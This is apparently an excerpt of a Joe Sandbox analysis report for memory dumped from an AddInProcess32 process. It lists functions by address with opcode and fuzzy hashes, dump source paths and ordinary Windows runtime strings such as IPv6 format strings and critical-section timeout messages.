                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 48fcf178caef373851e2aecb82353b225625f65190e993081963fbc5787b8d61
                                                                                                                                                                                                                                        • Instruction ID: 1c1e032d8728613da9f67641ddb059729752391594b963decd66de84bfa78cd9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48fcf178caef373851e2aecb82353b225625f65190e993081963fbc5787b8d61
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1290023324140407D10071585509707100997D2301F55D411A1428558DD7568A556222
                                                                                                                                                                                                                                        Function 01802C60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: b3f9b509e0bb5a61582cc35936dc8667679969fbaa7e50b29ab0620f5d497587
                                                                                                                                                                                                                                        • Instruction ID: a701860fc40d45aa10d086f78b3184ed2111332a22b95dae2aaa5d34647b0e9d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3f9b509e0bb5a61582cc35936dc8667679969fbaa7e50b29ab0620f5d497587
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8090023324140847D10071584405B46100997E2301F55C016A1128654DC715CA557622
                                                                                                                                                                                                                                        Function 01802FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 25a048bc2198c9823f9d44e652289b183e1c3a1af3a0d098e9583b47fbd2b304
                                                                                                                                                                                                                                        • Instruction ID: db95e60fffd0a48e2068eee4c6363c60366d66b501bec7c6293278e412853659
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25a048bc2198c9823f9d44e652289b183e1c3a1af3a0d098e9583b47fbd2b304
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF90023324180407D10071584809747100997D2302F55C011A6168555EC765CA956632
                                                                                                                                                                                                                                        Function 01802F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 05bdba576eae642fcc83c4583eec2f82bce2f4c988a78522f611fd7af91ecc84
                                                                                                                                                                                                                                        • Instruction ID: 66597f28e6345446d0d57b8df99dc9a257d73fe18976d94e1b3e993d84f322c3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 05bdba576eae642fcc83c4583eec2f82bce2f4c988a78522f611fd7af91ecc84
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4590026325140047D10471584405706104997E3301F55C012A3158554CC6298E655226
                                                                                                                                                                                                                                        Function 01802EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 505d08af37fa82ef927140204c1d74e708bf6282c32331f4211d2e9bc15a290a
                                                                                                                                                                                                                                        • Instruction ID: 2891a4898c371fcee10d842eb13c6aedc117a178528c537262ab37b3e8ab8a8f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 505d08af37fa82ef927140204c1d74e708bf6282c32331f4211d2e9bc15a290a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4590026324180407D14075584805607100997D2302F55C011A3068555ECB298E556236
                                                                                                                                                                                                                                        Function 01802E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6321e9f3cb489ed9f51a49d0be08a9c4a94ae63f2e95ceb1d4f707fd020ae15a
                                                                                                                                                                                                                                        • Instruction ID: 9e5cc1fdc56a12f8d6f467f2a4d8c52c97a2700e0404852f74576a68f39be3ec
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6321e9f3cb489ed9f51a49d0be08a9c4a94ae63f2e95ceb1d4f707fd020ae15a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1090022334140407D10271584415606100DD7D3345F95C012E2428555DC7258B57A233
                                                                                                                                                                                                                                        Function 01803090 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: f556f4f909889de6e9a96c7a668002717499ff222a151dfcb548567dedc9b4b6
                                                                                                                                                                                                                                        • Instruction ID: cd952ed95be80b5c6a94adcce133bed3bc22e060e35ef2039de8f10478d7f822
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f556f4f909889de6e9a96c7a668002717499ff222a151dfcb548567dedc9b4b6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7790022328140807D14071588415707100AD7D2701F55C011A1028554DC7168B6967B2
                                                                                                                                                                                                                                        Function 01803010 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 99ba87f10fb694eab013e42c36be145399c0b46ab918f1463854af5cd0eb0a41
                                                                                                                                                                                                                                        • Instruction ID: 7f438091565283a192ab61844ab7c63e24459347e6c4028ebb8c5eae3ce3e75d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99ba87f10fb694eab013e42c36be145399c0b46ab918f1463854af5cd0eb0a41
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB90022324184447D14072584805B0F510997E3302F95C019A515A554CCA158A595722
                                                                                                                                                                                                                                        Function 018035C0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 33df94f2eb2992f4a0880b0303108024c3fa7464ace7bd520e0a1cc3572307a1
                                                                                                                                                                                                                                        • Instruction ID: ed6901184416b9e963f5133572b8691055b0cbf8a80e85abd67577509dbe4070
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33df94f2eb2992f4a0880b0303108024c3fa7464ace7bd520e0a1cc3572307a1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF90023364550407D10071584515706200997D2301F65C411A1428568DC7958B5566A3
                                                                                                                                                                                                                                        Function 01802C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                                        • Instruction ID: e237b7bb4700b88f39381344c2952f816ef7d957fde6f9a398c868b0c61f2f22
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Function 01802890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                        • Opcode ID: f5586962a5010e78495e50fd6a6e6a63af9a9068277d5ee73fe85e031d909396
                                                                                                                                                                                                                                        • Instruction ID: eadf4d33aa506ee02ddbea93db23a1277edfbe0beddd79811e3bfa6769cd7d63
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5586962a5010e78495e50fd6a6e6a63af9a9068277d5ee73fe85e031d909396
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A51E3B6A0011EAFCB56DBAC8C9497EFBB9BB483407148229F5A5D7681D374DF4087E0
                                                                                                                                                                                                                                        Function 01872410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                        • Opcode ID: 207f5fb739e35ac2796f43b913887c9e62d50f0b1cd0a79d5e26aff9d6f1fc00
                                                                                                                                                                                                                                        • Instruction ID: 3498b9228738425217c17ddb792a1fe779a3d3dde6dc8366aedf354c158f0748
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 207f5fb739e35ac2796f43b913887c9e62d50f0b1cd0a79d5e26aff9d6f1fc00
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D51E5B5A00646AEDB30DF9CCCD09BFBBFAEB44304B048469F596D7641E674EB808760
                                                                                                                                                                                                                                        Function 0180B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                                                                                                                        • String ID: +$-$0$0
                                                                                                                                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                                                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                                                                                        • Instruction ID: 4b671ffe8753e3dd68e70b32d270105e77fa2841b0fc38c0b6a6614a7ee7cd11
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB81BF78E0524D8FEFAA8E6CCC517BEBBB1AF45360F184659D861E72D1C7308B408B51
                                                                                                                                                                                                                                        Function 018720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                                                                                                                                                        • API String ID: 48624451-2819853543
                                                                                                                                                                                                                                        • Opcode ID: 9ece24d2c8c59e980115c17350d1d4cfe21c76a34c7e1f139dcb3684496b3149
                                                                                                                                                                                                                                        • Instruction ID: 0778f157bdc0137686ea657434cece981092ad59ee27ca6b40aa3bb74628418e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9ece24d2c8c59e980115c17350d1d4cfe21c76a34c7e1f139dcb3684496b3149
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8821517AA00559ABDB11DE6DDC40AEEBBF9FF54754F040116EA45E3240E730EB418BA1
                                                                                                                                                                                                                                        Function 017EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018302E7
                                                                                                                                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018302BD
                                                                                                                                                                                                                                        • RTL: Re-Waiting, xrefs: 0183031E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                                                        • API String ID: 0-2474120054
                                                                                                                                                                                                                                        • Opcode ID: 5d97f62573b26a23f58f7fd30d02a7e9f83777ea8f435cfe9fff84cdf7db6e85
                                                                                                                                                                                                                                        • Instruction ID: c747c490d9f7ef52519a5cd31034671efdac40bce8d8fdcd06837716e7074df2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d97f62573b26a23f58f7fd30d02a7e9f83777ea8f435cfe9fff84cdf7db6e85
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59E18E706087419FE725CF2CC888B2ABBE1BB88314F140A6DF5A5CB6D1D774DA45CB82
                                                                                                                                                                                                                                        Function 017FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0183728C
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • RTL: Resource at %p, xrefs: 018372A3
                                                                                                                                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01837294
                                                                                                                                                                                                                                        • RTL: Re-Waiting, xrefs: 018372C1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                                                                                                                                        • Opcode ID: d21be346cb0d5bd6028d87543d7bc1121aad43e4f293f2fc3c9c2c8a904e2bd8
                                                                                                                                                                                                                                        • Instruction ID: ed92fbb63dfa0e1ed2f6179fa0a8805a4b7ab8e7428eeff3cb33e154d2dbd4c7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d21be346cb0d5bd6028d87543d7bc1121aad43e4f293f2fc3c9c2c8a904e2bd8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7410072700206ABD721DE29CC41F6AB7A5FB94710F14061DFA56EB380DB21FA468BD2
                                                                                                                                                                                                                                        Function 01872300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                                                                                                                                        • Opcode ID: 6da0b573c8b91f187500dc9706b1cad7a506272a92995794456a39ec028d961c
                                                                                                                                                                                                                                        • Instruction ID: 35c947a2649003a344cb862fef56bce6aa2d2297e2fba8e1e628adc2669ff9cd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6da0b573c8b91f187500dc9706b1cad7a506272a92995794456a39ec028d961c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41315072A002199FDB20DE2DDC40BEEB7F9EB54710F44455AE949E3250EB30EB448BA1
                                                                                                                                                                                                                                        Function 017C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $$@
                                                                                                                                                                                                                                        • API String ID: 0-1194432280
                                                                                                                                                                                                                                        • Opcode ID: 5c9ea28a2027f3adc3c6028c8dc1c28b93365ae6956847dcb602f98879cb70c3
                                                                                                                                                                                                                                        • Instruction ID: 94ef4ab80c571b81d2e48de43f003d9d22f7b8394cc85481a43384fc3cd0289a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c9ea28a2027f3adc3c6028c8dc1c28b93365ae6956847dcb602f98879cb70c3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A811D72D002699BDB72CB54CC45BEEB7B5AB48714F0041DAEA19B7240E7705F84CFA0
                                                                                                                                                                                                                                        Function 0184CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0184CFBD
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CallFilterFunc@8
                                                                                                                                                                                                                                        • String ID: @$@4Qw@4Qw
                                                                                                                                                                                                                                        • API String ID: 4062629308-2383119779
                                                                                                                                                                                                                                        • Opcode ID: f7818dd7c472d5b5484b7bbed327eeea9ea021ce13997e3f73224f9ddb4369b8
                                                                                                                                                                                                                                        • Instruction ID: fcbebb543278ceb88b9c641b7c23b5a68c9430ba5134be6504a2cd7388a034e4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7818dd7c472d5b5484b7bbed327eeea9ea021ce13997e3f73224f9ddb4369b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68419F71900219DFDB21DFA9C880AADFBB8FF64B40F10412AE915DB354DB749A01CB65